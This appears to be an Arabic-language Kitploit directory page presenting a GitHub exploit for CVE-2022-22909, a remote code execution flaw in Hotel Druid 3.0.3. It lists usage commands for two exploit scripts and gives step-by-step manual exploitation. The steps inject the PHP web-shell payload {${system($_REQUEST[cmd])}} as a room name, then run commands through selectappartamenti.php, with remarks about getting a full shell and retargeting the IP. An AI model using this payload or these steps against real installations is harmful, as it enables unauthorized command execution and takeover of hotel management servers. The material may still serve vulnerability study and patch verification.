Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-22909 — استغلالات لـ Hotel Druid 3.0.3 - تنفيذ التعليمات البرمجية عن بُعد (RCE) CVE-2022-22909 | Kitploit
أدوات/GitHubGitHub/kaal18/cve-2022-22909
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubkaal18/cve-2022-22909

CVE-2022-22909

استغلالات لـ Hotel Druid 3.0.3 - تنفيذ التعليمات البرمجية عن بُعد (RCE) CVE-2022-22909

عرض المستودع
24منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-22909 Hotel Druid 3.0.3 - تنفيذ الأوامر عن بُعد (RCE)

الاستغلال بواسطة kaal

أدوات الاستغلال

  1. HotelDruidExploit.py

هذا الاستغلال سيقوم بإنشاء غرفة جديدة تحتوي على حمولة PHP الخاصة بنا كاسم للغرفة.

الاستخدام: $ ./HotelDruidExploit.py -h

image

$ ./HotelDruidExploit.py -u http://127.0.0.1/hoteldruid

image


  1. HotelDruidExploitRoom.py

هذا الاستغلال سيعمل إذا كنت تعرف اسم الغرفة مسبقًا.

الاستخدام: $ ./HotelDruidExploitRoom.py -u "http://127.0.0.1/hoteldruid" -r "abc"

image


شرح خطوات الاستغلال:

1). انتقل إلى صفحة Hotel Druid.

2). انقر على Tables -> Rooms

image

3). في حقل Create New Room أضف كود PHP التالي، ثم انقر على Add.

{${system($_REQUEST[cmd])}}

image

4). سترى غرفة جديدة تحتوي على حمولتنا في حقل اسم "Room".

image

5). انتقل إلى الرابط أدناه وستحصل على تنفيذ الأوامر، وبعد ذلك يمكنك الحصول على شيل كامل.

http://127.0.0.1/hoteldruid/dati/selectappartamenti.php?cmd=whoami

ملاحظة: غيّر الـ IP إلى عنوان IP الخاص بالهدف الذي يعمل عليه hoteldruid.

وصف الثغرة:

تحدث هذه الثغرة لأن أسماء الغرف تُخزَّن داخل /var/www/html/hoteldruid/dati/selectappartamenti.php

image

وبما أن selectappartamenti.php هو ملف PHP، فإن أي كود PHP داخل هذا الملف سيتم تنفيذه بواسطة الخادم.

تنزيل الأداة